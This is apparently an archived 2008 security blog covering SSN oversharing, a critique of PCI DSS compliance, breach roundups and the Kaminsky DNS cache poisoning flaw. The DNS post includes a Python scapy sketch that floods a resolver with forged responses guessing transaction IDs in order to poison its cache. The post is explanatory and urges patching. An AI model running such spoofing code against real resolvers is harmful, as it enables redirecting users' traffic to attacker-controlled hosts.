Once again it’s time for the Lame Man’s View… only one story this week… and it’s a good one!
It comes to us from San Francisco. According to numerous reports on the web and on TV, the City of San Francisco has suffered several breaches and has spent most of its time notifying customers and citizens that their Social Security numbers may have been compromised. Now, this story is good in my eyes because of the way the City of San Francisco operates. This is a city that claims it is sovereign from the federal government and does not have to follow certain laws regarding the harboring of illegal aliens. I think the federal government should take this opportunity to withhold aid of any form from the City of San Francisco, to show them what it would really be like… were they actually sovereign.
http://youtube.com/watch?v=tisfvHviIGA
That’s all for this week… Catch me again next Friday…
Friday, July 25, 2008
You want my what? Really.
They say that identity theft is a larger and more profitable business than drug trafficking.
I wonder why.
Hmmm, I don't know, maybe because EVERYONE HAS MY PERSONAL INFORMATION.
Help desk analyst I talked to recently:
"In order for me to help you, I'll need your Social Security Number."
My response: Really?
Person from certification body auditing my credentials:
"If you'll give me your Social Security Number, I might be able to save some time in collecting the information I need."
My response: Really?
Nurse at doctor's office that I spent all of 6 minutes at:
"I'll need all of your information filled out on this form, including your Social Security Number."
My response: Really.
Enough is enough. In the past 3 weeks, I've been asked for my Social Security Number by 7 people I didn't know or inherently trust. Some of these people had legitimate reasons for asking for my info, but for others it was simply a matter of wanting to "save some time".
As security professionals and evaluators of controls and procedures, we should be the first to say, "Hey, how about we NOT ask for their SSN and maybe use other sources of info to verify their identity?"
I know what you're thinking. Wait, let ME say it. Social Security Numbers are one of the few reliable sources of personally identifiable information out there. I understand this. I just wonder why organizations worldwide use them so publicly and openly.
Bottom line: our Social Security Numbers shouldn't be the one and only source of information that we use to identify the people that interact with us. Organizations all over the world should be a little more creative with this process.
And to the people that GIVE this information so freely to the people that request it, all you need to do is say one word: "Why?" The organization or person should be able to answer this. If the response you're given makes your stomach hurt, just say: "Is there another piece of information that I can give you to identify me?" Most of the time there will be, and asking simple questions helps to limit the exposure in a number of ways.
Let me esplain...no wait, there is too much, let me sum up:
- If you were in a crowded area and someone asked you to verbally give them your credit card number, would you do it? I hope not. Granted, the number of people who can memorize 12 to 16 digits after hearing them once is pretty limited, but you get my point.
- The majority of the time, call center operators who ask for anything related to your Social Security Number are only asking for the last 4 digits; most of the time that's all that's visible on the monitor in front of them. If someone asks for the full meal deal, take caution and again ask, "Why?"
- Err on the side of caution when ANYONE asks for your SSN. Once you give it up, that's it. It's not like you can call American Express and ask them to issue you a new one.
Labels:
identity theft,
SSN
Tuesday, July 22, 2008
The big DNS security hole hype exposed
A little while ago, Dan Kaminsky announced a joint effort with multiple vendors to fix a major and "critical" security flaw in DNS. Dan had stated he would not release details of the vulnerability until his upcoming Black Hat talk, but it appears the information has already been leaked.
DNS cache poisoning is nothing new; on July 22, 1999, Hillary Clinton's site was the victim of a cache poisoning attack:
http://www.cnn.com/TECH/computing/9907/22/hillary.idg/
It appears that the vulnerability itself is due to predictable TXIDs and the lack of port randomization in DNS. Based on TXID inspection (and the blog post from Microsoft), it appears that roughly 4-8 bits of the TXID are predictable, which is enough to determine the PRNG state and predict future TXIDs.
Earlier fixes for DNS cache poisoning applied a PRNG to the TXID, or transaction ID; the vulnerability lies in the fact that those 4-8 predictable bits allow an attacker to predict the next TXID. Here's how the attack is supposed to work (hypothetically):
An attacker queries nameserverA for yahoo.com's IP address through DNS. nameserverA doesn't know yahoo.com's IP, so it goes to the root name servers and asks where the listings for .com are, then goes to the .com listings to find the authoritative DNS server for yahoo.com. After that the IP is resolved and you can browse normally to yahoo.com. The attack is performed on the requests nameserverA makes along the way: when nameserverA sends a request to the root server, the root server sends back a "referral" telling nameserverA where to go for the .com listings, and contained in this exchange of information is the TXID. The process keeps working its way down through the various DNS servers, ultimately reaching the authoritative DNS server.
Our guess at where the attack occurs is the response telling nameserverA where yahoo.com's server resides. If an attacker can spoof a valid TXID and claim that yahoo.com's name server is really ns.badhacker.com rather than ns.yahoo.com, so that the name ultimately resolves to 1.1.1.1 instead of 2.2.2.2, he can poison that name server's cache.
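To make that spoofing step concrete, here's a minimal, hypothetical sketch in Python using scapy of what the forged-response flood might look like. Every host name, IP address, and the narrowed TXID range below are invented for illustration; this is the general shape of the technique as described above, not a working exploit.

from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, send

VICTIM_RESOLVER = "192.0.2.53"    # hypothetical nameserverA
SPOOFED_AUTH_NS = "198.51.100.1"  # address we forge as the source (the real authoritative NS)
QUERY_NAME      = "www.yahoo.com."
ATTACKER_IP     = "203.0.113.66"  # where we want the name to resolve (the "1.1.1.1" above)

def forged_response(txid):
    """Build one spoofed answer claiming QUERY_NAME lives at ATTACKER_IP."""
    return (
        IP(src=SPOOFED_AUTH_NS, dst=VICTIM_RESOLVER)
        / UDP(sport=53, dport=53)  # pre-patch, the resolver's query port was often predictable
        / DNS(
            id=txid, qr=1, aa=1,   # a response, flagged authoritative
            qd=DNSQR(qname=QUERY_NAME),
            an=DNSRR(rrname=QUERY_NAME, type="A", ttl=86400, rdata=ATTACKER_IP),
        )
    )

# If only ~8 of the 16 TXID bits are effectively unpredictable, the guess
# space collapses from 65,536 candidates to a few hundred, which is easy to
# flood in the race window before the legitimate answer arrives.
for guess in range(256):
    send(forged_response(guess), verbose=False)

The whole attack is a race: the forged packets have to land before the real server's answer does, which is why shrinking the TXID guess space matters so much.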
So the initial speculation that this is bad is pretty accurate, and it explains why everything was kept hush-hush to allow all vendors to patch their systems accordingly. Kudos to Dan Kaminsky for taking all of the scrutiny over this and for giving vendors time to patch their systems against something that was in fact not just hype, but could have major implications if exploited successfully.
I hope all of your DNS servers are patched; a proof of concept should be pretty easy to write based on this.
Special thanks to Microsoft for releasing details about the patch and letting us know what the vulnerability was:
http://blogs.technet.com/swi/archive/2008/04/09/ms08-020-how-predictable-is-the-dns-transaction-id.aspx
Special thanks to John Melvin from SecureState for helping me out on this.
Again, this is purely hypothetical; it has been neither confirmed nor denied.
UPDATE: It appears the attack has been confirmed and worked out on Halvar Flake's blog. In addition, Matasano also described it, but their post was up only temporarily and was taken down when discovered; a mirror can be found at: http://beezari.livejournal.com/141796.html. Patch your servers, folks!
PATCH: What the patch does appears to be pretty cut and dried: it makes the TXID truly random and randomizes the DNS source ports, pretty much rendering this attack useless.
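For a rough sense of why that helps, here's a back-of-the-envelope sketch; the bit counts are assumptions drawn from the discussion above, not measured values.

# Rough math on the patch: a blind attacker must now match a truly random
# 16-bit TXID AND a randomized source port, instead of guessing a handful
# of predictable TXID bits. All figures here are illustrative assumptions.
txid_bits = 16  # full TXID now unpredictable
port_bits = 16  # ephemeral port range is roughly 2**16 (somewhat less in practice)

pre_patch_guesses  = 2 ** 8                       # if only ~8 TXID bits were unknown
post_patch_guesses = 2 ** (txid_bits + port_bits)

print(f"pre-patch search space:  {pre_patch_guesses:,}")   # 256
print(f"post-patch search space: {post_patch_guesses:,}")  # 4,294,967,296

That's roughly a sixteen-million-fold increase in the work a blind spoofer has to do per race, which is why port randomization was the centerpiece of the coordinated patch.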
Labels:
DNS,
dns poisoning,
exploit,
kaminsky,
ms08-020,
TXID,
vulnerability
PCI Compliance: Close but no cigar.
PCI compliance is on almost everyone's mind, and it will continue to grow in importance as time goes on. Before I start: this is by no means a rant against or a flaming of the PCI DSS 1.1 standard; in fact, the PCI DSS is the most technical security framework out there to date. There is a lot of positive in the standard; however, it has many shortcomings. I'm not going to list every one, but I will focus on some of the most pressing issues we've seen as penetration testers and on where the standard is really failing.
First, let's start with this: the standard should never be fully relied upon for an organization's overall security posture. A mature security organization typically pulls from many standards, such as ISO 27001/27002, the NSA IAM, NIST, PCI, etc. One thing this standard really has accomplished is jump-starting security in organizations and getting security taken seriously. Historically, banks were at the forefront of protecting data due to the sensitive nature of their information, while most other organizations' security was left to the wind; that has since begun to shift in a different direction.
As a penetration tester running a team of gifted hackers, I get to see every environment and configuration known to man. Thanks to PCI requirement 11.3, "perform penetration testing at least once a year," we run a variety of penetration testing assessments against PCI-compliant organizations. One of the most alarming statistics is our 63 percent success rate in breaching systems at PCI-compliant organizations. By breaching systems, we're talking about full access to the underlying operating system and the potential to penetrate further into the network. That 63 percent doesn't even include access to back-end databases, login bypasses, and the various other issues we find during a pentest.
PCI DSS 1.1 states in requirement 6.5 that organizations should use the OWASP guidelines to secure their systems. PCI 1.1 references the 2004 OWASP Top Ten, which is missing good ol' malicious file execution, among others. In addition, the ASV scans that need to be performed only check for XSS and SQL injection. Vulnerability scanners in general are pretty rudimentary and basic at vulnerability identification, but detecting only two of the overall top ten is a major issue. Requirement 6.6 mandates that a code review or a WAF be in place, which should hopefully stop SOME of these attacks, but the alarming issue here is that we've run successful penetration tests against sites that have undergone a code review, or that have a WAF in place providing only minor protection against attacks.
WAFs are great (if properly configured), don't get me wrong, but they should not be the only layer of defense. Building a secure systems development life cycle (SSDLC) that starts at the beginning of development, runs all the way through it, and establishes code freezes for security testing before going into production is vital and is the preferred method. Web applications have been getting a bum rap and are the major points of entry for external breaches to date. The standard simply states "Installing an application-layer firewall in front of web-facing applications"; it says nothing about the exceptions allowed for site functionality (which introduce exposures) or about hardening techniques. Again, the purpose of the standard was never to secure your systems for you, but at least to give organizations a framework for implementing security.
My next question about the DSS standard is: who performs the code reviews looking for these common vulnerabilities? Most VARs have a penetration testing wing, generally consisting of two people who implement product and do penetration testing as a side job (oh, and hey, if you buy this product it'll fix your vulnerabilities). These folks generally use tools that don't touch the web application layer in any depth, giving organizations false satisfaction and assurance. There's no certification process for web application assessors; the standard only says "an organization that specializes in application security." If I have Nessus, does that make me a specialist in web application security? If I have AppScan, WebInspect, Ounce, Fortify, or any of the others, does running a tool make me a specialist?
My last main issue covers the ASV guidelines, quoted directly from the ASV scanning standard:
"Merchants and service providers have the ultimate responsibility for defining the scope of their PCI Security Scan, though they may seek expertise from ASVs for help. If an account data compromise occurs via an IP address or component not included in the scan, the merchant or service provider is responsible. "
We've run into many scenarios where organizations use this loophole to take systems out of scope for the PCI assessment. While the organization is "responsible" if a compromise occurs, the companies we see doing this generally treat it as a way to pass the test without ever putting any of the required security restrictions in place on the system. Per this statement, a main e-commerce site handling all credit card transactions for the organization can be taken out of scope by the merchant or service provider if they so choose. At that point, what is the point of becoming compliant at all? Why study hard for a "C" when you can get an "A" every time without ever studying? "Sure, it's bad if you get caught cheating, but what's the downside? We're never going to get breached!"
To finish the point I've been driving at: organizations are really using this to become "secure," when that isn't the intended effect at all. For an organization to truly incorporate security, adoption has to be widespread within the organization, pulling from multiple frameworks and standards and incorporating them into a regularly tested and updated program. Relying solely on PCI compliance and running through the checklist is not going to protect you from a breach by any means.
Labels:
compliance,
hacking,
iam,
iso,
nist,
nsa,
pci,
pci compliance,
penetration,
penetration testing,
Security
The Lame Man's Perspective
The Lame Man delves into the security breaches and stories of the past week and reveals the Good (or at least an attempt to find the good), the Bad, and the oh-so-Ugly.
Good… Security breaches aren't good… people lose their information, face the threat of identity theft, lose money, and suffer everything else that comes along with it. But this story out of DC gets the pat on the back for the week. According to the Washington Post, the Social Security numbers of almost 4,700 current and former Metro employees were posted on the agency's website last month. The mistake was made while the transit authority was soliciting possible workers' comp and risk management vendors. Here's the good part of the breach: Metro suspended the three workers responsible for the incident for one month without pay. It's always good to hear that someone is being punished for a lack of common sense.
Bad… LPL Financial. The Boston-based broker-dealer reported that it has begun taking several steps to increase its data protection. This, after being breached for the second time in less than a year! The article in Investment News says that the steps LPL is taking (since its first breach last July) to "beef up" its security include raising the profile of data security within the company at all levels, hiring a chief security/privacy officer, and implementing a new information privacy and security program. Something tells me this plan isn't working…
And the Ugly for this week comes from Washington and the Washington Education Association's website, which was brought down by Turkish hackers. According to seattlepi.com, the attack also brought down the sites of several local teachers' union affiliates. The report goes on to say that the attack did not compromise any personal data… but the reason this stands as the ugly story of the week is that the association is still having problems one month later! Oh, and they still proudly display: Hackers 1, WEA 0.